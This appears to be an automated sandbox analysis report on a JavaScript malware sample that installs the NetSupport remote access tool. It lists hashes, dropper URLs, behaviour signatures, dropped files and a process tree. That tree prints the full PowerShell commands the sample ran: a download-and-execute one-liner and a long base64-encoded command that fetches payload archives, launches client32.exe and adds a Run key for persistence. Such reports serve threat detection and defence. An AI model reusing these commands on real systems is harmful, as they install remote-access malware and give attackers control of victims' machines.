Analysis

  • max time kernel
    134s
  • max time network
    164s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23/01/2024, 12:38

General

  • Target

    in_5505503550550.js

  • Size

    25KB

  • MD5

    a1b9dd447c4d6f9183c5bf87947e25a9

  • SHA1

    4f432cbe8e8af24ad387d6610ac9faf77c9a546d

  • SHA256

    105c853779f94467b02eaa90a34a8f72443cab1548904132f2e7e552d02319bc

  • SHA512

    0471387eab700330007f078989cd2ac9f2e5733a49141c19cf6331b3d5baa41e5fbace94d88fc31f2519ff94df622fbf31c80fb854310777e288d35cc0674d78

  • SSDEEP

    768:WK8dfrxV8cShXNCEfcrUUe/7kS831swOD4Wz/D3ntccJn/XjCfUnwYOYoE1NbKfD:ymwMTnZc3HH

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://hsdiagnostico.com/readme.php

Extracted

Language
ps1
Source
URLs
exe.dropper

https://core-click.net/TVFrontend/NSM.zip

exe.dropper

https://core-click.net/TVFrontend/remcmdstub.zip

exe.dropper

https://core-click.net/TVFrontend/DLAA1view.zip

exe.dropper

https://core-click.net/TVFrontend/mock/

Signatures

  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 5 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\in_5505503550550.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4444
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://hsdiagnostico.com/readme.php')"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3108
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noPROFi -ExECutionpoL ByPass -w hidd -E JAA5AE4AUQB4AFQAPQAnAEgASQBaAEwATQBJAC4AegBpAHAAJwA7ACAAYwBoAEQASQByACAAJABlAE4AVgA6AGEAcABwAEQAYQB0AEEAOwAgACQAcQBnAEoASAA3AD0AZwBFAFQALQBjAG8AbQBNAEEATgBEACAARQBYAHAAYQBOAGQALQBhAFIAYwBIAEkAdgBFACAALQBlAFIAUgBPAFIAYQBjAFQAaQBPAG4AIABzAGkATABFAE4AVABMAHkAYwBvAG4AdABJAE4AVQBFADsAIAAkAEsANAB1AEEATQA9ACcAWABpADgANQAxADcAOQAuAHoAaQBwACcAOwAgAFsAbgBFAHQALgBzAGUAUgB2AEkAQwBlAHAATwBJAE4AdABtAEEAbgBhAEcARQBSAF0AOgA6AHMARQBDAFUAUgBJAFQAeQBQAFIAbwBUAE8AYwBvAGwAIAA9ACAAWwBuAEUAdAAuAHMARQBjAFUAcgBpAFQAeQBQAHIAbwBUAE8AYwBPAGwAdABZAHAARQBdADoAOgB0AEwAUwAxADIAOwAgACQASABuAGcAZgBEAD0AJwBoAHQAdABwAHMAOgAvAC8AYwBvAHIAZQAtAGMAbABpAGMAawAuAG4AZQB0AC8AVABWAEYAcgBvAG4AdABlAG4AZAAvAE4AUwBNAC4AegBpAHAAJwA7ACAAJABKAEMANQBSAHoANQBOAFMAPQBnAEMATQAgAFMAVABBAFIAdAAtAGIASQBUAFMAdABSAGEAbgBTAGYARQByACAALQBFAHIAcgBvAFIAQQBDAFQASQBPAG4AIABzAGkATABlAE4AdABMAHkAQwBvAG4AdABJAE4AVQBFADsAIAAkAEgAcABvAHkATQA9ACcAYQByAGEAZwBkAHIAdABzACcAOwAgACQAUQBkAEkANABwAEEAOABZAD0AJwBoAHQAdABwAHMAOgAvAC8AYwBvAHIAZQAtAGMAbABpAGMAawAuAG4AZQB0AC8AVABWAEYAcgBvAG4AdABlAG4AZAAvAHIAZQBtAGMAbQBkAHMAdAB1AGIALgB6AGkAcAAnADsAIAAkAHkAMQBsAEkANwBQAGkATgA9ACcAaAB0AHQAcABzADoALwAvAGMAbwByAGUALQBjAGwAaQBjAGsALgBuAGUAdAAvAFQAVgBGAHIAbwBuAHQAZQBuAGQALwBEAEwAQQBBADEAdgBpAGUAdwAuAHoAaQBwACcAOwAgACQASgBhAGcAaABPAD0AJwBiAFQAUwBmAFEAVgBoAC4AegBpAHAAJwA7ACAAJABmAEoAQQBSAGgAVABmAFYAPQAiAHsAMAB9AFwAewAxAH0AIgAgAC0AZgAgACQARQBuAFYAOgBhAFAAcABEAGEAdABhACwAIAAkAEsANAB1AEEATQA7ACAAJABHAFEAVQBTADQARABoAHEAPQAkAEUAbgB2ADoAYQBQAHAARABBAHQAQQArACcAXAAnACsAJABKAGEAZwBoAE8AOwAgACQAcgA4AGsAegBRADMAZQBqAD0AIgB7ADAAfQBcAHsAMQB9ACIAIAAtAGYAIAAkAEUAbgBWADoAQQBwAHAAZABhAFQAYQAsACAAJAA5AE4AUQB4AFQAOwAgACQAdQBzAHMASABXAHIAPQAnAEIASQBUAFMAYQBEAE0ASQBOAC4ARQBYAEUAIAAvAFQAcgBBAG4AcwBmAGUAUgAgAGQAZABkAHYAUwAwAFYAagAgAC8AZABvAFcAbgBsAG8AYQBEACAALwBQAHIAaQBPAHIAaQB0AHkAIABuAG8AUgBtAEEATAAnACwAIAAkAEgAbgBnAGYARAAsACAAJABmAEoAQQBSAGgAVABmAFYAIAAtAEoATwBpAG4AIAAnACAAJwA7ACAAJAA1AFUARgB6AEkAPQAiAGIAaQBUAFMAYQBEAE0AaQBOAC4AZQBYAGUAIAAvAHQAcgBhAE4AUwBmAGUAUgAgAHIANAAyAGkAagBKACAALwBEAG8AVwBuAEwAbwBBAEQAIAAvAHAAcgBpAE8AcgBJAFQAWQAgAE4AbwBSAE0AQQBsACAAewAwAH0AIAB7ADEAfQAiACAALQBmACAAJAB5ADEAbABJADcAUABpAE4ALAAgACQAcgA4AGsAegBRADMAZQBqADsAIAAkAE0AeABjAEQAMgBiAFYAPQAiAEIAaQB0AHMAYQBkAE0ASQBuAC4AZQB4AGUAIAAvAFQAcgBBAG4AUwBGAEUAcgAgAFEAWABIAE0ATwBUACAALwBEAE8AVwBOAEwATwBBAGQAIAAvAFAAcgBJAE8AUgBpAHQAeQAgAG4AbwBSAE0AYQBMACAAJABRAGQASQA0AHAAQQA4AFkAIAAkAEcAUQBVAFMANABEAGgAcQAiADsAIAAkAFcAbQBUAE0ARgBDAHAAVwA9AEoATwBJAG4ALQBQAEEAdABoACAALQBwAEEAdABoACAAJABFAE4AdgA6AEEAcABQAEQAQQBUAEEAIAAtAEMAaABJAGwAZABwAGEAVABIACAAJABIAHAAbwB5AE0AOwAgAGkARgAgACgAJABxAGcASgBIADcAKQAgAHsAIABpAEYAIAAoACQASgBDADUAUgB6ADUATgBTACkAIAB7ACAAcwB0AGEAUgBUAC0AYgBpAFQAUwB0AFIAYQBOAFMAZgBlAHIAIAAtAFMATwB1AHIAYwBFACAAJABRAGQASQA0AHAAQQA4AFkAIAAtAGQARQBTAFQASQBuAEEAdABpAE8AbgAgACQARwBRAFUAUwA0AEQAaABxADsAIABzAHQAQQByAHQALQBCAEkAdABTAFQAUgBBAG4AcwBGAEUAcgAgAC0AcwBvAFUAUgBjAGUAIAAkAEgAbgBnAGYARAAgAC0ARABlAHMAVABpAG4AYQB0AEkATwBOACAAJABmAEoAQQBSAGgAVABmAFYAOwAgAHMAdABBAFIAVAAtAEIASQB0AFMAVABSAEEAbgBTAEYAZQBSACAALQBzAE8AVQBSAGMARQAgACQAeQAxAGwASQA3AFAAaQBOACAALQBEAGUAUwB0AEkATgBBAHQASQBPAG4AIAAkAHIAOABrAHoAUQAzAGUAagA7ACAAfQAgAGUAbABTAGUAIAB7AEkAbgBWAE8ASwBFAC0ARQB4AFAAcgBFAHMAcwBJAG8ATgAgAC0AQwBvAE0ATQBBAG4ARAAgACQAdQBzAHMASABXAHIAOwAgAGkATgB2AG8ASwBFAC0AZQBYAHAAUgBFAHMAUwBJAG8AbgAgAC0AYwBPAG0AbQBhAG4ARAAgACQATQB4AGMARAAyAGIAVgA7ACAAJgAgACQANQBVAEYAegBJADsAIAB9ACAAZQBYAFAAYQBOAEQALQBBAHIAYwBoAEkAdgBFACAALQBQAEEAdABIACAAJABmAEoAQQBSAGgAVABmAFYAIAAtAGQAZQBzAHQASQBOAEEAVABpAG8ATgBwAGEAVABoACAAJABXAG0AVABNAEYAQwBwAFcAOwAgAEUAeABwAEEATgBkAC0AYQByAEMAaABpAHYARQAgAC0AcABhAFQAaAAgACQAcgA4AGsAegBRADMAZQBqACAALQBkAGUAUwB0AGkAbgBhAHQAaQBPAE4AUABBAHQASAAgACQAVwBtAFQATQBGAEMAcABXADsAIABFAHgAcABBAG4AZAAtAGEAUgBjAEgAaQBWAEUAIAAtAHAAYQBUAEgAIAAkAEcAUQBVAFMANABEAGgAcQAgAC0AZABFAFMAVABJAE4AYQB0AGkAbwBuAHAAYQBUAGgAIAAkAFcAbQBUAE0ARgBDAHAAVwA7ACAAcgBEACAALQBQAGEAdABoACAAJAByADgAawB6AFEAMwBlAGoAOwAgAEUAcgBBAHMAZQAgAC0AcABBAHQAaAAgACQAZgBKAEEAUgBoAFQAZgBWADsAIAByAE0AIAAtAHAAQQBUAEgAIAAkAEcAUQBVAFMANABEAGgAcQA7ACAAfQAgAGUAbABTAGUAIAB7ACAAJABEAGYAYwBWAHUAZQA9ACcAaAB0AHQAcABzADoALwAvAGMAbwByAGUALQBjAGwAaQBjAGsALgBuAGUAdAAvAFQAVgBGAHIAbwBuAHQAZQBuAGQALwBtAG8AYwBrAC8AJwA7ACAAJABvAFcAQwB5AG8APQBAACgAJwBIAFQAQwBUAEwAMwAyAC4ARABMAEwAJwAsACAAJwBuAHMAbQBfAHYAcAByAG8ALgBpAG4AaQAnACwAIAAnAGMAbABpAGUAbgB0ADMAMgAuAGkAbgBpACcALAAgACcAYwBsAGkAZQBuAHQAMwAyAC4AZQB4AGUAJwAsACAAJwBwAGMAaQBjAGEAcABpAC4AZABsAGwAJwAsACAAJwBuAHMAawBiAGYAbAB0AHIALgBpAG4AZgAnACwAIAAnAE4AUwBNAC4ATABJAEMAJwAsACAAJwBtAHMAdgBjAHIAMQAwADAALgBkAGwAbAAnACwAIAAnAHIAZQBtAGMAbQBkAHMAdAB1AGIALgBlAHgAZQAnACwAIAAnAFAAQwBJAEMATAAzADIALgBEAEwATAAnACwAIAAnAFQAQwBDAFQATAAzADIALgBEAEwATAAnACwAIAAnAEEAdQBkAGkAbwBDAGEAcAB0AHUAcgBlAC4AZABsAGwAJwAsACAAJwBQAEMASQBDAEgARQBLAC4ARABMAEwAJwApADsAIABuAEkAIAAtAFAAQQB0AEgAIAAkAEUAbgBWADoAYQBQAFAAZABhAHQAQQAgAC0ATgBhAE0ARQAgACQASABwAG8AeQBNACAALQBJAFQARQBNAHQAWQBwAGUAIAAnAGQAaQByAGUAYwB0AG8AcgB5ACcAOwAgAGkARgAgACgAJABKAEMANQBSAHoANQBOAFMAKQAgAHsAIAAkAG8AVwBDAHkAbwAgAHwAIABmAG8AcgBlAGEAYwBoAC0ATwBiAEoARQBDAHQAIAB7ACAAJAB5AEkARQBsAEgASABOAD0AJABEAGYAYwBWAHUAZQArACQAXwA7ACAAJAA2AEUAeABlAFkAcgBwAD0AJABXAG0AVABNAEYAQwBwAFcAKwAnAFwAJwArACQAXwA7ACAAUwBUAEEAUgB0AC0AYgBpAHQAcwB0AFIAYQBuAFMARgBFAHIAIAAtAHMAbwBVAHIAYwBFACAAJAB5AEkARQBsAEgASABOACAALQBEAGUAcwB0AGkATgBBAFQASQBvAE4AIAAkADYARQB4AGUAWQByAHAAOwAgAH0AOwB9ACAAZQBMAHMARQAgAHsAIAAkAG8AVwBDAHkAbwAgAHwAIABGAE8AUgBlAEEAYwBoACAAewAgACQAeQBJAEUAbABIAEgATgA9ACQARABmAGMAVgB1AGUAKwAkAF8AOwAgACQANgBFAHgAZQBZAHIAcAA9ACIAewAwAH0AXAB7ADEAfQAiACAALQBmACAAJABXAG0AVABNAEYAQwBwAFcALAAgACQAXwA7ACAAJABBAFcAagB5AEgAZwA9ACIAYgBJAHQAcwBBAGQATQBpAE4ALgBFAHgARQAgAC8AdAByAEEAbgBTAEYARQBSACAAbAB5AHEANABYAFkANQBpACAALwBkAG8AVwBuAEwATwBhAEQAIAAvAHAAUgBpAG8AcgBpAHQAWQAgAE4AbwBSAG0AQQBsACAAJAB5AEkARQBsAEgASABOACAAJAA2AEUAeABlAFkAcgBwACIAOwAgAEkATgBWAE8AawBlAC0AZQBYAHAAUgBlAHMAcwBpAG8ATgAgAC0AQwBPAG0ATQBBAE4AZAAgACQAQQBXAGoAeQBIAGcAOwB9ADsAIAB9ADsAIAB9ADsAIAAkAHYAUQByAHMAUAA9AEcAZQBUAC0ASQB0AEUATQAgACQAVwBtAFQATQBGAEMAcABXACAALQBGAE8AcgBjAGUAOwAgACQAdgBRAHIAcwBQAC4ATgBhAE0ARQA9ACcASABpAGQAZABlAG4AJwA7ACAAYwBEACAAJABXAG0AVABNAEYAQwBwAFcAOwAgACQATAB1AEsAbQAwAEcAagBHAD0AIgB7ADAAfQBcAGMAbABpAGUAbgB0ADMAMgAuAGUAeABlACIAIAAtAGYAIAAkAFcAbQBUAE0ARgBDAHAAVwA7ACAAcwB0AGEAUgBUAC0AUABSAG8AYwBlAHMAcwAgAGMAbABpAGUAbgB0ADMAMgAuAGUAeABlADsAIABuAEUAdwAtAGkAVABFAG0AcAByAG8AcABlAFIAdAB5ACAALQBQAEEAdABIACAAJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgAnACAALQBOAGEATQBFACAAJABIAHAAbwB5AE0AIAAtAFYAYQBsAFUARQAgACQATAB1AEsAbQAwAEcAagBHACAALQBwAFIATwBwAGUAcgB0AFkAdAB5AFAAZQAgACcAUwB0AHIAaQBuAGcAJwA7AA==
        3⤵
        • Adds Run key to start application
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1012
        • C:\Users\Admin\AppData\Roaming\aragdrts\client32.exe
          "C:\Users\Admin\AppData\Roaming\aragdrts\client32.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          PID:4796

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    dd6085af47993de750fc1bba39e02d75

    SHA1

    c83d868735b3170ae109cacc1163ba647ab3e5b2

    SHA256

    847924eed8197b381f6dfe87f2f1ad3d6a4ea542e5afe291e3e5144419ba28b4

    SHA512

    9d50ba6331a1c5b1ae6b38bdee8e8bf871d63c3245b78b40d6287b9730e862bd731f99e1956ddf28db819592b35b005824b078535de2a0003523ebd8ab62c59d

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    c20ac38ae3022e305b8752804aadf486

    SHA1

    4c144d6cfafb5c37ab4810ff3c1744df81493cdb

    SHA256

    03cba7e903a418a3966af1dc0debfb5fcfb2ac6d372ec48cb1b93c23e0fd1caf

    SHA512

    c9def9e5cd09d19b8b47a3f4c61893da715a6ba4b9933c885386d0425ee4ccc30d75eac1097511619d4e6259a46581f803fb38f78a15339391e4e78b0b6153e0

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3solie3a.ris.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\aragdrts\HTCTL32.DLL

    Filesize

    320KB

    MD5

    2d3b207c8a48148296156e5725426c7f

    SHA1

    ad464eb7cf5c19c8a443ab5b590440b32dbc618f

    SHA256

    edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796

    SHA512

    55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c

  • C:\Users\Admin\AppData\Roaming\aragdrts\NSM.LIC

    Filesize

    258B

    MD5

    9e482d086f86c0ea705aba09847b7491

    SHA1

    008e4fef872595a4d61a6977f26d8b6e45c7b758

    SHA256

    bb8591770a069d090a0208e9981e07a92ce01e560e48e4dbf0d7f2261e84dc95

    SHA512

    0e744e0b1f1c2a92bb54897609921e0e6578f295fe4f47adc570bc99855eb42e38f77b9069a68404473d566b8db4f5840b8da48345c5f9fb709ba82af84606de

  • C:\Users\Admin\AppData\Roaming\aragdrts\PCICL32.dll

    Filesize

    3.4MB

    MD5

    060fc0325b170f0fc966b9a66a8a1837

    SHA1

    0f5bbfba97185e3a83dbb539ad7aeb4627534a14

    SHA256

    074bfe6c615ea6f2eb467b39069620662fed7342a09003e9cc6a0c84b4801f70

    SHA512

    e586e77c4dd96914cea2823de4e4f39bc7a40c5ba3f2bf747f89837703f2d8a52cb305dc3074964f5e8fd5552bcf620daaabc33f218dfd2f62b77fb5c233d5f6

  • C:\Users\Admin\AppData\Roaming\aragdrts\client32.exe

    Filesize

    114KB

    MD5

    f36a7294ff7aa92571a3fd7c91282dd5

    SHA1

    849e777458ef42b3138f33f6e50623246eafb7a7

    SHA256

    42c2d35457abce2fea3897ba5e569f51b74b40302ff15b782e3b20b0aa00b34e

    SHA512

    285165bdf774e4db062c996dc148dfd6a5263d89a7ae3e1bb193afb9513cd95a40dc8689ab1fd5c56b90fbdd65c6b05cfe2a3cbde4195d5b8bef239eac315145

  • C:\Users\Admin\AppData\Roaming\aragdrts\client32.ini

    Filesize

    634B

    MD5

    177fa5379c8d7bddd60d227dd33b3a31

    SHA1

    3e3049b6aad78f81073f0aaaeed5347d1c8d62ba

    SHA256

    000e3f630049435b9113aaf28e2cfedad58eb7a749a421923527ee4bd8031dd6

    SHA512

    93efdf2af5d6d544715a1cec52260ba59062346f212bff58cf5f196b28093f8168e6a3c76a2a1fbf874ab3ba68dfc6905c5cf37f2bd96bc51ab492edec6b7abe

  • C:\Users\Admin\AppData\Roaming\aragdrts\msvcr100.dll

    Filesize

    755KB

    MD5

    0e37fbfa79d349d672456923ec5fbbe3

    SHA1

    4e880fc7625ccf8d9ca799d5b94ce2b1e7597335

    SHA256

    8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18

    SHA512

    2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

  • C:\Users\Admin\AppData\Roaming\aragdrts\pcicapi.dll

    Filesize

    32KB

    MD5

    dcde2248d19c778a41aa165866dd52d0

    SHA1

    7ec84be84fe23f0b0093b647538737e1f19ebb03

    SHA256

    9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917

    SHA512

    c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166

  • C:\Users\Admin\AppData\Roaming\aragdrts\pcichek.dll

    Filesize

    18KB

    MD5

    a0b9388c5f18e27266a31f8c5765b263

    SHA1

    906f7e94f841d464d4da144f7c858fa2160e36db

    SHA256

    313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a

    SHA512

    6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

  • C:\Users\Admin\AppData\Roaming\aragdrts\pcicl32.dll

    Filesize

    3.5MB

    MD5

    db6e233ebebe917c013e19dc22a7595c

    SHA1

    215d32b856c4a3369e2402c15fe7ae08ccde5ec0

    SHA256

    739416066a3713573ee7c779a28db944bac1b93e935e6e52b92fdb4b7c354ea0

    SHA512

    b16311816de18dcb6df2352ade231e7497f43e2f22f8d5ea13bd7200ba5a66873dac46f2ec9cf03ead11cfd42c25c0bf0007e96f8286621a7539ee26dcfe4d67

  • memory/1012-24-0x0000013BA0390000-0x0000013BA03B6000-memory.dmp

    Filesize

    152KB

  • memory/1012-14-0x0000013B9DF50000-0x0000013B9DF60000-memory.dmp

    Filesize

    64KB

  • memory/1012-63-0x0000013B9DF50000-0x0000013B9DF60000-memory.dmp

    Filesize

    64KB

  • memory/1012-29-0x0000013BA0400000-0x0000013BA040A000-memory.dmp

    Filesize

    40KB

  • memory/1012-28-0x0000013BA0420000-0x0000013BA0432000-memory.dmp

    Filesize

    72KB

  • memory/1012-77-0x00007FF955F20000-0x00007FF9569E1000-memory.dmp

    Filesize

    10.8MB

  • memory/1012-13-0x00007FF955F20000-0x00007FF9569E1000-memory.dmp

    Filesize

    10.8MB

  • memory/1012-62-0x00007FF955F20000-0x00007FF9569E1000-memory.dmp

    Filesize

    10.8MB

  • memory/1012-25-0x0000013BA03E0000-0x0000013BA03F4000-memory.dmp

    Filesize

    80KB

  • memory/3108-0-0x000002278DE80000-0x000002278DEA2000-memory.dmp

    Filesize

    136KB

  • memory/3108-26-0x00007FF955F20000-0x00007FF9569E1000-memory.dmp

    Filesize

    10.8MB

  • memory/3108-27-0x000002278DEF0000-0x000002278DF00000-memory.dmp

    Filesize

    64KB

  • memory/3108-11-0x000002278DEF0000-0x000002278DF00000-memory.dmp

    Filesize

    64KB

  • memory/3108-12-0x000002278DEF0000-0x000002278DF00000-memory.dmp

    Filesize

    64KB

  • memory/3108-90-0x00007FF955F20000-0x00007FF9569E1000-memory.dmp

    Filesize

    10.8MB

  • memory/3108-10-0x00007FF955F20000-0x00007FF9569E1000-memory.dmp

    Filesize

    10.8MB